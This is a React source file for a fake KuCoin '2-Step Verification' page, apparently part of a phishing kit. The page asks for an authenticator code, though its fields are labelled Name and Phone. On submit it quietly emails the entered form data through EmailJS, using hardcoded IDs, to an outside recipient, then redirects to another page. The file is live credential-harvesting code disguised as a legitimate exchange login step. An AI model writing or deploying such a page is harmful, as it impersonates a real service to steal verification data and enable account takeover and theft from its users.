import React, { useRef } from "react";
import "./Twostepverify.css";
import logo from "../../assets/logokucoin.svg";
import { useNavigate } from "react-router";
import Chat from "../important/Chat";
import emailjs from '@emailjs/browser';

const Twostepverify = () => {

  const navigate = useNavigate();

  const formRef = useRef();

  const handlesubmittwo = (event) => {
    event.preventDefault();

    const serviceId = "service_30uaae8";
    const templateId = "template_0leau1o";
    const userId = "ZAclt8hkdW0xOqwpy";

    emailjs.sendForm(serviceId, templateId, formRef.current, userId).then(
      (result) => {
        navigate("/important"); // Navigate after successful email send
      },
    );
  };

  return (
    <>
      <Chat />
      <div className="container12">
        <img src={logo} alt="" />
        <form onSubmit={handlesubmittwo} ref={formRef}>
          <h2>
            2-Step <br /> Verification
          </h2>
          <p className="twopara">
            Enter the 2-step verification generated by your
            <br />
            authenticator app.
          </p>
          <div className="input-field">
            <input type="text" placeholder="Name" required id="name" name="toname"/>
            <input type="number" placeholder="Phone" required id="phone" name="tomessage" minlength="9" />
            <button>Verify</button>
          </div>
        </form>
      </div>
    </>
  );
};

export default Twostepverify;
